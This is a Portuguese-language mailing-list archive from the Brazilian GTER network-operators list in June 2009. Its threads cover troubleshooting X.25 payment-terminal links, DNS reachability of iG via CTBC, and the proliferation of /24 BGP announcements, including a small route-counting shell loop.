com ruido, mas > >>>> > >> eles fazem > >> > >>>> testes de loop e no identificam nada, por fim pedi uma > >>>> > >>>> Analise de pacotes(com muito trabalho consegui agendar com a > >>>> telefonica). > >>>> > >>>> Existe um software que eu consiga analisar os debug-tracer do > >>>> PR-1000(COMO EXEMPLO . ANALISE DE "CLEAR")? > >>>> > >>>> 1) Fato j verificado a comunicao do protocolo X.25 est UP. > >>>> > >>>> 2) A comunicao com a administradora estabilizada, esta > dando para > >>>> verificar no show status da iface SWAN. > >>>> > >>>> Valeu pessoal > >>>> > >>>> > >>>> > >>> > >>> > > > > > > From rcr.listas at ig.com.br Fri Jun 12 13:40:13 2009 From: rcr.listas at ig.com.br (Ricardo Rodrigues) Date: Fri, 12 Jun 2009 13:40:13 -0300 Subject: [GTER] DNS ig.com.br via CTBC In-Reply-To: <4A32756F.3010400@netconsultoria.com.br> References: <4A32756F.3010400@netconsultoria.com.br> Message-ID: <437c6dc60906120940w795033eax17387a637788f6de@mail.gmail.com> Tobias, Estou fora da rede do iG e os dois servidores est?o respondendo. Interessante que estes servidores s?o autoritativos e caching ao mesmo tempo. Abs, Ricardo 2009/6/12 Tobias P. Santos : > Boa tarde, > > Possu?mos link CTBC e n?o conseguimos acessar os servidores DNS do IG > (200.225.157.104 e 200.225.157.105). > > dig www.ig.com.br @200.225.157.104 > > ; <<>> DiG 9.4.2-P2 <<>> www.ig.com.br @200.225.157.104 > ;; global options: ?printcmd > ;; connection timed out; no servers could be reached > > Mais algu?m encontrando problema semelhante? > > Tobias. > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From christiano at dipelnet.com.br Fri Jun 12 13:30:26 2009 From: christiano at dipelnet.com.br (Christiano Becker) Date: Fri, 12 Jun 2009 13:30:26 -0300 Subject: [GTER] =?iso-8859-1?q?Controle_de_aloca=E7=E3o_dos_IPs?= In-Reply-To: <4A327BEC.5040405@emota.com.br> References: <4A327BEC.5040405@emota.com.br> Message-ID: Utilizo o IPMaster (http://www.softsession.com/products/ipmaster.htm) Funciona muito bem! []'s Christiano Becker Em 12/06/2009, ?s 13:01, Eduardo Mota escreveu: > Feliz dia dos namorados! > J? que estou trabalhando hoje, que tal mandar e-mail ? > > Gostaria de saber se algu?m pode me indicar algum software / sistema > para controlar a aloca??o dos meus IPs, estivo o sistema on-line do > Registro.BR,. algo assim. > > Queria algo que tivesse, mostrasse, para quem aloquei minhas subredes, > quais as dispon?veis ... algo assim. > Se poss?vel at? mesmo algo que eu possa informar a banda dispon?vel do > cliente e alguma observa??o especial. > > Algu?m indica algo? > > De qualquer forma, obrigado a todos. > > Atenciosamente, > Eduardo Mota. > > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From enio.alcantara at rezendesistemas.com.br Fri Jun 12 13:38:24 2009 From: enio.alcantara at rezendesistemas.com.br (=?ISO-8859-1?Q?Enio_Herenio_de_Alc=E2ntara?=) Date: Fri, 12 Jun 2009 13:38:24 -0300 Subject: [GTER] RES: RES: Debug PR-1000 In-Reply-To: References: <4A324BE1.20400@rezendesistemas.com.br> Message-ID: <4A328480.6080503@rezendesistemas.com.br> Toledo, Muito obrigado pela ajuda , gra?as a persist?ncia para que eles colocassem o analisador de pacotes conseguimos identificar o problema e resolve-lo. E gra?as a Deus o problema realmente estava com a telef?nica. Conforme conversa telefonica, foi provado que o problema estava no Ruido da linha,apresentando taxa de CRC. Ap?s a troca do gabinete as transa??es de carga de tabelas foram executadas com sucesso. Vlw Enio Toledo, Luis Carlos escreveu: > Qdo vc contrata um X.25 vc deve especificar qtos canais l?gicos vc precisa > para uso simultaneo, e no router configurar o mesmo numero de canais. > > O router da cyclades faz o papel de proxy, recebendo os pacotes via > socket/IP e redirecionando canal l?gico do X.25 > > Se faltar canal, o pacote ? perdido. > > Vc pode operar as bandeiras atravez de N redes que fazem a TEF, precisa ver > quais as redes vc est? cadastrado. > > A comunica??o se d? atravez do sevidor TEF (concentrador SITEF), e este > tamb?m tem um cadastro de porta x IP, para saber para qual canal X.25 enviar > a solicita??o de TEF, isso tamb?m utilizando o banco de dados de PINs. > > Ent?o tudo tem que estar ajustadinho, sen?o o resultado final ? perda de > pacote, ou pacote enviado para rede errada que ? considerado ingeligivel. > > Se o sistema TEF j? est? em produ??o eu sugiro verificar o nr de canais > l?gicos contratados x canais configurados no router, e atualizar a tabala de > PINs do concentrador SITEF. > > Se o sistema TEF est? em implanta??o utilizar ambiente de valida??o que a > carrier, no caso software express, fornece. > > Abs Toledo > > >> Toledo, >> >> O Router ta com 5 canais e s?o somente duas bandeiras. >> Voce conhe?e algum software para analise o tracer do PR-1000? >> Pois para analise deste relatorio de logs do router fico na >> m?o do pessoal da Software Express. >> >> att >> >> Enio >> >> Toledo, Luis Carlos escreveu: >> >>> Ol? Enio, uma vez apanhei muito de um sistema TEF (PR1000+X.25), na >>> verdade estavam faltando canais l?gicos. >>> Solicitei o aumento de canais l?gicos junto a telefonica e >>> >> o problema >> >>> foi resolvido. >>> Se tiver ruido na linha o modem n?o alinha. >>> >>> Abs Toledo >>> >>> >>>> Pessaol, >>>> >>>> Estou enfrentando problema de perca de pacotes e ou alterao / >>>> ingelibilidade dos pacotes enviados do pr-1000 usando >>>> >> protocolo X.25. >> >>>> Meio de comunicao: Telefonica >>>> >>>> Acredito que a linha possivelmente esteja com ruido, mas >>>> >> eles fazem >> >>>> testes de loop e no identificam nada, por fim pedi uma >>>> >>>> Analise de pacotes(com muito trabalho consegui agendar com a >>>> telefonica). >>>> >>>> Existe um software que eu consiga analisar os debug-tracer do >>>> PR-1000(COMO EXEMPLO . ANALISE DE "CLEAR")? >>>> >>>> 1) Fato j verificado a comunicao do protocolo X.25 est UP. >>>> >>>> 2) A comunicao com a administradora estabilizada, esta dando para >>>> verificar no show status da iface SWAN. >>>> >>>> Valeu pessoal >>>> >>>> >>>> >>> >>> > > > From sergio at inbox.com Fri Jun 12 15:50:17 2009 From: sergio at inbox.com (sergio) Date: Fri, 12 Jun 2009 10:50:17 -0800 Subject: [GTER] Problemas no acesso ao iG In-Reply-To: Message-ID: <962B524027A.000000E4sergio@inbox.com> Eu tamb?m estou com o mesmo problema. > -----Original Message----- > From: renato.ornelas at gmail.com > Sent: Fri, 12 Jun 2009 11:18:21 -0300 > To: gter at eng.registro.br > Subject: [GTER] Problemas no acesso ao iG > > Prezados, > Estamos com problemas para acessar o iG e baixaki (ambos est?o no mesmo > /24). > > Tem mais algu?m com problemas? Algu?m poderia me dar o n?mero do NOC > deles > em PVT? > > Atenciosamente, > Renato Ornelas > -- > gter list https://eng.registro.br/mailman/listinfo/gter From antoniocarlospina at gmail.com Fri Jun 12 16:10:54 2009 From: antoniocarlospina at gmail.com (Antonio Carlos Pina) Date: Fri, 12 Jun 2009 16:10:54 -0300 Subject: [GTER] Problemas no acesso ao iG In-Reply-To: <962B524027A.000000E4sergio@inbox.com> References: <962B524027A.000000E4sergio@inbox.com> Message-ID: <86b352050906121210s41e4330ehf3e8020561a75111@mail.gmail.com> Observei que o IG est? inacess?vel para algumas de nossas redes via Brasiltelecom. Desviamos o tr?fego para outros links (mudando os an?ncios) e passou a funcionar. Informem esse comportamento ? CTBC para ver se ? a mesma coisa. Abs 2009/6/12 sergio > Eu tamb?m estou com o mesmo problema. > > > > -----Original Message----- > > From: renato.ornelas at gmail.com > > Sent: Fri, 12 Jun 2009 11:18:21 -0300 > > To: gter at eng.registro.br > > Subject: [GTER] Problemas no acesso ao iG > > > > Prezados, > > Estamos com problemas para acessar o iG e baixaki (ambos est?o no mesmo > > /24). > > > > Tem mais algu?m com problemas? Algu?m poderia me dar o n?mero do NOC > > deles > > em PVT? > > > > Atenciosamente, > > Renato Ornelas > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From wendersonsouza at gmail.com Fri Jun 12 16:28:23 2009 From: wendersonsouza at gmail.com (Wenderson Souza) Date: Fri, 12 Jun 2009 16:28:23 -0300 Subject: [GTER] Amapa/Macapa In-Reply-To: <20a28b1b0906120708s31c74b7fh9c879284600f051@mail.gmail.com> References: <20a28b1b0906081017h6efd3fb0w2bdcd100aa5e3b18@mail.gmail.com> <6d3b97100906081914q151294dco8fcef7c3d52f279e@mail.gmail.com> <20a28b1b0906091746o26b2e6b3n8f010914d2e681@mail.gmail.com> <6d3b97100906101725q9a64fadx496e7735cb8b39c8@mail.gmail.com> <20a28b1b0906120708s31c74b7fh9c879284600f051@mail.gmail.com> Message-ID: <6d3b97100906121228n66aac578gf76f5d19082e2021@mail.gmail.com> Macap?: 359mil habitantes (IBGE 2008) http://pt.wikipedia.org/wiki/Macap%C3%A1 Wenderson Souza e-mail: wendersonsouza at gmail.com msn: wendersonsouza at msn.com 2009/6/12 max _tor > E isso mesmo ou ta errado? > > Habitantes Macapa: 8000.00 > Habitantes Amapa: 550.000 > > 2009/6/10 Wenderson Souza > > > Boa noite max_tor, > > > > 2009/6/9 max _tor > > > > > Quanto de banda voce opera hoje? lantecia nessa magnitude, nem pensar > em > > > voip > > > correto? > > > > > > Opero hoje com apenas 3 Mbits (CIR de 100%). Temos demanda, mas custo > alto > > para amplia??o. > > > > > > > Com relacao a ultima milha, acho que e um processo relativo, a medida > > > que tem banda, as ultimas milhas se formam, cabo (coax), FTH , radio, > > > ADSL, isso ja seria questao de tempo. > > > > > > Concordo em g?nero, n?mero e grau. > > > > > > Wenderson Souza > > e-mail: wendersonsouza at gmail.com > > msn: wendersonsouza at msn.com > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From alexandre at onda.psi.br Fri Jun 12 17:02:27 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Fri, 12 Jun 2009 17:02:27 -0300 Subject: [GTER] Problemas no acesso ao iG In-Reply-To: <86b352050906121210s41e4330ehf3e8020561a75111@mail.gmail.com> References: <962B524027A.000000E4sergio@inbox.com> <86b352050906121210s41e4330ehf3e8020561a75111@mail.gmail.com> Message-ID: <4A32B453.8060702@onda.psi.br> Por aqui ta blz !! link ctbc .. dns local ; <<>> DiG 9.3.4-P1 <<>> www.ig.com.br @2001:12ac::2 ; (1 server found) ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63606 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0 ;; QUESTION SECTION: ;www.ig.com.br. IN A ;; ANSWER SECTION: www.ig.com.br. 3600 IN A 200.226.133.74 ;; AUTHORITY SECTION: ig.com.br. 3600 IN NS ns1.ig.com.br. ig.com.br. 3600 IN NS ns2.ig.com.br. ;; Query time: 70 msec ;; SERVER: 2001:12ac::2#53(2001:12ac::2) ;; WHEN: Fri Jun 12 17:01:37 2009 ;; MSG SIZE rcvd: 83 Antonio Carlos Pina wrote: > Observei que o IG est? inacess?vel para algumas de nossas redes via > Brasiltelecom. > > Desviamos o tr?fego para outros links (mudando os an?ncios) e passou a > funcionar. Informem esse comportamento ? CTBC para ver se ? a mesma coisa. > > Abs > > > 2009/6/12 sergio > > >> Eu tamb?m estou com o mesmo problema. >> >> >> >>> -----Original Message----- >>> From: renato.ornelas at gmail.com >>> Sent: Fri, 12 Jun 2009 11:18:21 -0300 >>> To: gter at eng.registro.br >>> Subject: [GTER] Problemas no acesso ao iG >>> >>> Prezados, >>> Estamos com problemas para acessar o iG e baixaki (ambos est?o no mesmo >>> /24). >>> >>> Tem mais algu?m com problemas? Algu?m poderia me dar o n?mero do NOC >>> deles >>> em PVT? >>> >>> Atenciosamente, >>> Renato Ornelas >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > From clayton at ntelecom.com.br Fri Jun 12 17:34:47 2009 From: clayton at ntelecom.com.br (Clayton Assis) Date: Fri, 12 Jun 2009 17:34:47 -0300 Subject: [GTER] Problemas no acesso ao iG In-Reply-To: <86b352050906121210s41e4330ehf3e8020561a75111@mail.gmail.com> References: <962B524027A.000000E4sergio@inbox.com> <86b352050906121210s41e4330ehf3e8020561a75111@mail.gmail.com> Message-ID: <4A32BBE7.2050103@ntelecom.com.br> Pela CTBC tamb?m n?o conseguiamos acesso o problema foi resolvido era 16h mais ou menos. Antonio Carlos Pina escreveu: > Observei que o IG est? inacess?vel para algumas de nossas redes via > Brasiltelecom. > > Desviamos o tr?fego para outros links (mudando os an?ncios) e passou a > funcionar. Informem esse comportamento ? CTBC para ver se ? a mesma coisa. > > Abs > > > 2009/6/12 sergio > > >> Eu tamb?m estou com o mesmo problema. >> >> >> >>> -----Original Message----- >>> From: renato.ornelas at gmail.com >>> Sent: Fri, 12 Jun 2009 11:18:21 -0300 >>> To: gter at eng.registro.br >>> Subject: [GTER] Problemas no acesso ao iG >>> >>> Prezados, >>> Estamos com problemas para acessar o iG e baixaki (ambos est?o no mesmo >>> /24). >>> >>> Tem mais algu?m com problemas? Algu?m poderia me dar o n?mero do NOC >>> deles >>> em PVT? >>> >>> Atenciosamente, >>> Renato Ornelas >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From casfre at gmail.com Fri Jun 12 18:11:02 2009 From: casfre at gmail.com (casfre at gmail.com) Date: Fri, 12 Jun 2009 18:11:02 -0300 Subject: [GTER] DNS ig.com.br via CTBC In-Reply-To: <4A32756F.3010400@netconsultoria.com.br> References: <4A32756F.3010400@netconsultoria.com.br> Message-ID: 2009/6/12 Tobias P. Santos : > Possu?mos link CTBC e n?o conseguimos acessar os servidores DNS do IG > (200.225.157.104 e 200.225.157.105). > > Mais algu?m encontrando problema semelhante? Ambos funcionando aqui, em duas redes diferentes, ambas IPs da CTBC. Obrigado. C?ssio From danton at inexo.com.br Fri Jun 12 10:29:32 2009 From: danton at inexo.com.br (Danton Nunes) Date: Fri, 12 Jun 2009 10:29:32 -0300 (BRT) Subject: [GTER] excesso de /24's e blocos menores anunciados Message-ID: Caros, recebo tabela de rotas parcial (basicamente brasil) com cinco mil e cacetada rotas. fiz esta pequena brincadeira com meu roteador (linux+quagga): # for ((i=1; i<33; i++)) > do > printf '%2d : ' $i > /sbin/ip route show | fgrep zebra | fgrep /$i' ' | wc -l > done que basicamente conta quantas rotas existem para cada tamanho de prefixo, e obtive isto: 1 : 0 2 : 0 3 : 0 4 : 0 5 : 0 6 : 0 7 : 0 8 : 0 9 : 0 10 : 0 11 : 0 12 : 0 13 : 0 14 : 4 15 : 28 16 : 216 17 : 144 18 : 441 19 : 451 20 : 684 21 : 715 22 : 375 23 : 573 24 : 2054 25 : 7 26 : 16 27 : 1 28 : 1 29 : 95 30 : 6 31 : 1 32 : 0 porque diabos h? tantos an?ncios de /24s quando o tamanho m?nimo de bloco alocado ? /20? e mais ainda me surpreendeu a quantidade de prefixos mais longos. h? at? um /31, que leva jeito de ser uma interface serial. mais chocante ainda ? que v?rios dos /24 s?o cont?guos, do mesmo sistema aut?nomo, entrando pelo mesm?ssimo lugar, conferido com traceroute, isto ?, poderia empacotar tudo sem qualquer problema. onde ? que essa gente aprendeu a configurar BGP-4, no banheiro? indignado, Danton. From jarruda-gter at jarruda.com Sat Jun 13 10:48:11 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Sat, 13 Jun 2009 09:48:11 -0400 Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: References: Message-ID: <4A33AE1B.7010106@jarruda.com> Danton Nunes wrote: > Caros, > > recebo tabela de rotas parcial (basicamente brasil) com cinco mil e > cacetada rotas. fiz esta pequena brincadeira com meu roteador > (linux+quagga): > > # for ((i=1; i<33; i++)) >> do >> printf '%2d : ' $i >> /sbin/ip route show | fgrep zebra | fgrep /$i' ' | wc -l >> done > Curiosidade, fgrep zebra so mostra as rotas que se aprende via BGP ? > que basicamente conta quantas rotas existem para cada tamanho de > prefixo, e obtive isto: > > 1 : 0 > 2 : 0 > 3 : 0 > 4 : 0 > 5 : 0 > 6 : 0 > 7 : 0 > 8 : 0 > 9 : 0 > 10 : 0 > 11 : 0 > 12 : 0 > 13 : 0 > 14 : 4 > 15 : 28 > 16 : 216 > 17 : 144 > 18 : 441 > 19 : 451 > 20 : 684 > 21 : 715 > 22 : 375 > 23 : 573 > 24 : 2054 > 25 : 7 > 26 : 16 > 27 : 1 > 28 : 1 > 29 : 95 > 30 : 6 > 31 : 1 > 32 : 0 > > porque diabos h? tantos an?ncios de /24s quando o tamanho m?nimo de > bloco alocado ? /20? e mais ainda me surpreendeu a quantidade de > prefixos mais longos. h? at? um /31, que leva jeito de ser uma interface > serial. > > mais chocante ainda ? que v?rios dos /24 s?o cont?guos, do mesmo sistema > aut?nomo, entrando pelo mesm?ssimo lugar, conferido com traceroute, isto > ?, poderia empacotar tudo sem qualquer problema. onde ? que essa gente > aprendeu a configurar BGP-4, no banheiro? > > indignado, > Danton. > -- > gter list https://eng.registro.br/mailman/listinfo/gter From frederick at dahype.org Sat Jun 13 14:31:41 2009 From: frederick at dahype.org (Renato Frederick) Date: Sat, 13 Jun 2009 13:31:41 -0400 Subject: [GTER] RES: excesso de /24's e blocos menores anunciados In-Reply-To: References: Message-ID: Hehehe, Danton, o pux?o de orelha serve para mim em partes... antes o ISP tinha um esquema de 2 links e clientes home em um e comerciais em outros. Com o ASN segmentei a rede em /24 e publiquei os /24 para ter uma certa prefer?ncia de forma que continue home em um link e comercial em outros, seguindo uma dica publicada aqui pelo Juliano Primavesi, de tamb?m publicar o /20 junto. Realmente eu poderia otimizar, divulgando talvez /23, mas hoje publico /24, what a shame! :( > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Danton Nunes > Enviada em: sexta-feira, 12 de junho de 2009 10:30 > Para: gter at eng.registro.br > Assunto: [GTER] excesso de /24's e blocos menores anunciados > > Caros, > > recebo tabela de rotas parcial (basicamente brasil) com cinco mil e > cacetada rotas. fiz esta pequena brincadeira com meu roteador > (linux+quagga): > > # for ((i=1; i<33; i++)) > > do > > printf '%2d : ' $i > > /sbin/ip route show | fgrep zebra | fgrep /$i' ' | wc -l > > done > > que basicamente conta quantas rotas existem para cada tamanho de > prefixo, > e obtive isto: > > 1 : 0 > 2 : 0 > 3 : 0 > 4 : 0 > 5 : 0 > 6 : 0 > 7 : 0 > 8 : 0 > 9 : 0 > 10 : 0 > 11 : 0 > 12 : 0 > 13 : 0 > 14 : 4 > 15 : 28 > 16 : 216 > 17 : 144 > 18 : 441 > 19 : 451 > 20 : 684 > 21 : 715 > 22 : 375 > 23 : 573 > 24 : 2054 > 25 : 7 > 26 : 16 > 27 : 1 > 28 : 1 > 29 : 95 > 30 : 6 > 31 : 1 > 32 : 0 > > porque diabos h? tantos an?ncios de /24s quando o tamanho m?nimo de > bloco > alocado ? /20? e mais ainda me surpreendeu a quantidade de prefixos > mais > longos. h? at? um /31, que leva jeito de ser uma interface serial. > > mais chocante ainda ? que v?rios dos /24 s?o cont?guos, do mesmo > sistema > aut?nomo, entrando pelo mesm?ssimo lugar, conferido com traceroute, > isto > ?, poderia empacotar tudo sem qualquer problema. onde ? que essa gente > aprendeu a configurar BGP-4, no banheiro? > > indignado, > Danton. > -- > gter list https://eng.registro.br/mailman/listinfo/gter From eduardo.andrez at gmail.com Sat Jun 13 13:21:52 2009 From: eduardo.andrez at gmail.com (Andrez) Date: Sat, 13 Jun 2009 13:21:52 -0300 Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: References: Message-ID: <1c499e9d0906130921r65d96b77k97d223169badafca@mail.gmail.com> 2009/6/12 Danton Nunes > > porque diabos h? tantos an?ncios de /24s quando o tamanho m?nimo de bloco > alocado ? /20? e mais ainda me surpreendeu a quantidade de prefixos mais > longos. h? at? um /31, que leva jeito de ser uma interface serial. Como voc? faz balanceamento de link? Na m?o mesmo? Parte disso ai vem de balanceamentos autom?tico, pelo menos creio eu. Adminitir que isso seja incopet?ncia ? anunciar o colapso na Internet. > > mais chocante ainda ? que v?rios dos /24 s?o cont?guos, do mesmo sistema > aut?nomo, entrando pelo mesm?ssimo lugar, conferido com traceroute, isto ?, > poderia empacotar tudo sem qualquer problema. onde ? que essa gente aprendeu > a configurar BGP-4, no banheiro? > > indignado, > Danton. Eu recebo an?ncios 10.0.0.0/8 e outras CIDRs privados de quem ? cheio de frescura para aceitar meus an?ncios. -- Atenciosamente. Eduardo Andrez de Oliveira. From gustkiller at gmail.com Sat Jun 13 10:50:07 2009 From: gustkiller at gmail.com (Gustavo Santos) Date: Sat, 13 Jun 2009 10:50:07 -0300 Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: References: Message-ID: <276fbe8b0906130650k5486185bj8ffa01ac4d8e30ad@mail.gmail.com> Danton, N?o seriam os blocos dos clientes da sua operadora de transito? Isto justificaria rotas estes prefixos. 2009/6/12 Danton Nunes > Caros, > > recebo tabela de rotas parcial (basicamente brasil) com cinco mil e > cacetada rotas. fiz esta pequena brincadeira com meu roteador > (linux+quagga): > > # for ((i=1; i<33; i++)) > >> do >> printf '%2d : ' $i >> /sbin/ip route show | fgrep zebra | fgrep /$i' ' | wc -l >> done >> > > que basicamente conta quantas rotas existem para cada tamanho de prefixo, e > obtive isto: > > 1 : 0 > 2 : 0 > 3 : 0 > 4 : 0 > 5 : 0 > 6 : 0 > 7 : 0 > 8 : 0 > 9 : 0 > 10 : 0 > 11 : 0 > 12 : 0 > 13 : 0 > 14 : 4 > 15 : 28 > 16 : 216 > 17 : 144 > 18 : 441 > 19 : 451 > 20 : 684 > 21 : 715 > 22 : 375 > 23 : 573 > 24 : 2054 > 25 : 7 > 26 : 16 > 27 : 1 > 28 : 1 > 29 : 95 > 30 : 6 > 31 : 1 > 32 : 0 > > porque diabos h? tantos an?ncios de /24s quando o tamanho m?nimo de bloco > alocado ? /20? e mais ainda me surpreendeu a quantidade de prefixos mais > longos. h? at? um /31, que leva jeito de ser uma interface serial. > > mais chocante ainda ? que v?rios dos /24 s?o cont?guos, do mesmo sistema > aut?nomo, entrando pelo mesm?ssimo lugar, conferido com traceroute, isto ?, > poderia empacotar tudo sem qualquer problema. onde ? que essa gente aprendeu > a configurar BGP-4, no banheiro? > > indignado, > Danton. > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From tdamas at gmail.com Sat Jun 13 11:22:42 2009 From: tdamas at gmail.com (Thiago Damas) Date: Sat, 13 Jun 2009 11:22:42 -0300 Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: <4A33AE1B.7010106@jarruda.com> References: <4A33AE1B.7010106@jarruda.com> Message-ID: Nao seria para balancear melhor a entrada quando possui links com varias operadoras, por isso anunciam /24 (menor prefixo atualmente "aceito" e propagado)? Thiago 2009/6/13 Julio Arruda : > Danton Nunes wrote: >> >> Caros, >> >> recebo tabela de rotas parcial (basicamente brasil) com cinco mil e >> cacetada rotas. fiz esta pequena brincadeira com meu roteador >> (linux+quagga): >> >> # for ((i=1; i<33; i++)) >>> >>> do >>> printf '%2d : ' $i >>> /sbin/ip route show | fgrep zebra | fgrep /$i' ' | wc -l >>> done >> > > Curiosidade, fgrep zebra so mostra as rotas que se aprende via BGP ? > > >> que basicamente conta quantas rotas existem para cada tamanho de prefixo, >> e obtive isto: >> >> ?1 : 0 >> ?2 : 0 >> ?3 : 0 >> ?4 : 0 >> ?5 : 0 >> ?6 : 0 >> ?7 : 0 >> ?8 : 0 >> ?9 : 0 >> 10 : 0 >> 11 : 0 >> 12 : 0 >> 13 : 0 >> 14 : 4 >> 15 : 28 >> 16 : 216 >> 17 : 144 >> 18 : 441 >> 19 : 451 >> 20 : 684 >> 21 : 715 >> 22 : 375 >> 23 : 573 >> 24 : 2054 >> 25 : 7 >> 26 : 16 >> 27 : 1 >> 28 : 1 >> 29 : 95 >> 30 : 6 >> 31 : 1 >> 32 : 0 >> >> porque diabos h? tantos an?ncios de /24s quando o tamanho m?nimo de bloco >> alocado ? /20? e mais ainda me surpreendeu a quantidade de prefixos mais >> longos. h? at? um /31, que leva jeito de ser uma interface serial. >> >> mais chocante ainda ? que v?rios dos /24 s?o cont?guos, do mesmo sistema >> aut?nomo, entrando pelo mesm?ssimo lugar, conferido com traceroute, isto ?, >> poderia empacotar tudo sem qualquer problema. onde ? que essa gente aprendeu >> a configurar BGP-4, no banheiro? >> >> indignado, >> Danton. >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From rubensk at gmail.com Sat Jun 13 22:12:55 2009 From: rubensk at gmail.com (Rubens Kuhl) Date: Sat, 13 Jun 2009 22:12:55 -0300 Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: <1c499e9d0906130921r65d96b77k97d223169badafca@mail.gmail.com> References: <1c499e9d0906130921r65d96b77k97d223169badafca@mail.gmail.com> Message-ID: <6bb5f5b10906131812o201f4fdbn346d873170b723ab@mail.gmail.com> > Eu recebo an?ncios 10.0.0.0/8 e outras CIDRs privados de quem ? cheio de > frescura para aceitar meus an?ncios. "(...) be conservative in what you do, be liberal in what you accept from others." Robustness Principle, Jon Postel RFC 793, "TRANSMISSION CONTROL PROTOCOL DARPA INTERNET PROGRAM PROTOCOL SPECIFICATION" Rubens From MBORBA at trf3.jus.br Sun Jun 14 10:28:44 2009 From: MBORBA at trf3.jus.br (MARLON BORBA) Date: Sun, 14 Jun 2009 10:28:44 -0300 Subject: [GTER] excesso de /24's e blocos menores anunciados Message-ID: <4A34D0DD020000460002041B@svntrf311.trf3.jus.br> Com todo o respeito, sermos liberais com o que aceitamos n?o nos permite fazer vista grossa ao que est? errado. Nossa obriga??o - como provou Danton - ? a de alertar os interessados. Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio - Seguran?a da Informa??o IPv6 Evangelist - MoReq-Jus Evangelist TRF 3a Regi?o (11) 3012-1581 -- Practically no IT system is risk free. (NIST Special Publication 800-30) -- >>> Rubens Kuhl 13/06/09 22:13 >>> > Eu recebo an?ncios 10.0.0.0/8 e outras CIDRs privados de quem ? cheio de > frescura para aceitar meus an?ncios. "(...) be conservative in what you do, be liberal in what you accept from others." Robustness Principle, Jon Postel RFC 793, "TRANSMISSION CONTROL PROTOCOL DARPA INTERNET PROGRAM PROTOCOL SPECIFICATION" Rubens -- gter list https://eng.registro.br/mailman/listinfo/gter From juliano at cyberweb.com.br Sun Jun 14 10:53:04 2009 From: juliano at cyberweb.com.br (Juliano Primavesi - Cyberweb Networks) Date: Sun, 14 Jun 2009 10:53:04 -0300 Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: <4A34D0DD020000460002041B@svntrf311.trf3.jus.br> References: <4A34D0DD020000460002041B@svntrf311.trf3.jus.br> Message-ID: <4A3500C0.3010205@cyberweb.com.br> De fato, cabe a cada um aceitar ou filtrar determinados tamanhos de anuncios... desde que com um default-route na retaguarda. Juliano MARLON BORBA escreveu: > Com todo o respeito, sermos liberais com o que aceitamos n?o nos permite fazer vista grossa ao que est? errado. Nossa obriga??o - como provou Danton - ? a de alertar os interessados. > > > > Abra?os, > > Marlon Borba, CISSP, APC DataCenter Associate > T?cnico Judici?rio - Seguran?a da Informa??o > IPv6 Evangelist - MoReq-Jus Evangelist > TRF 3a Regi?o > (11) 3012-1581 > -- > Practically no IT system is risk free. > (NIST Special Publication 800-30) > -- > >>>> Rubens Kuhl 13/06/09 22:13 >>> >>>> >> Eu recebo an?ncios 10.0.0.0/8 e outras CIDRs privados de quem ? cheio de >> frescura para aceitar meus an?ncios. >> > > "(...) be conservative in what you do, be liberal in what you accept > from others." > Robustness Principle, Jon Postel > RFC 793, "TRANSMISSION CONTROL PROTOCOL DARPA INTERNET PROGRAM > PROTOCOL SPECIFICATION" > > > > Rubens > -- > gter list https://eng.registro.br/mailman/listinfo/gter > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From danton at inexo.com.br Sun Jun 14 12:19:54 2009 From: danton at inexo.com.br (Danton Nunes) Date: Sun, 14 Jun 2009 12:19:54 -0300 (BRT) Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: <4A33AE1B.7010106@jarruda.com> References: <4A33AE1B.7010106@jarruda.com> Message-ID: On Sat, 13 Jun 2009, Julio Arruda wrote: > Curiosidade, fgrep zebra so mostra as rotas que se aprende via BGP ? exatamente. From danton at inexo.com.br Sun Jun 14 12:28:27 2009 From: danton at inexo.com.br (Danton Nunes) Date: Sun, 14 Jun 2009 12:28:27 -0300 (BRT) Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: <276fbe8b0906130650k5486185bj8ffa01ac4d8e30ad@mail.gmail.com> References: <276fbe8b0906130650k5486185bj8ffa01ac4d8e30ad@mail.gmail.com> Message-ID: On Sat, 13 Jun 2009, Gustavo Santos wrote: > N?o seriam os blocos dos clientes da sua operadora de transito? Isto > justificaria rotas estes prefixos. n?o. alguns tem 3 ou 4 AS diferentes na rota. From danton at inexo.com.br Sun Jun 14 12:30:23 2009 From: danton at inexo.com.br (Danton Nunes) Date: Sun, 14 Jun 2009 12:30:23 -0300 (BRT) Subject: [GTER] excesso de /24's e blocos menores anunciados In-Reply-To: <6bb5f5b10906131812o201f4fdbn346d873170b723ab@mail.gmail.com> References: <1c499e9d0906130921r65d96b77k97d223169badafca@mail.gmail.com> <6bb5f5b10906131812o201f4fdbn346d873170b723ab@mail.gmail.com> Message-ID: On Sat, 13 Jun 2009, Rubens Kuhl wrote: >> Eu recebo an?ncios 10.0.0.0/8 e outras 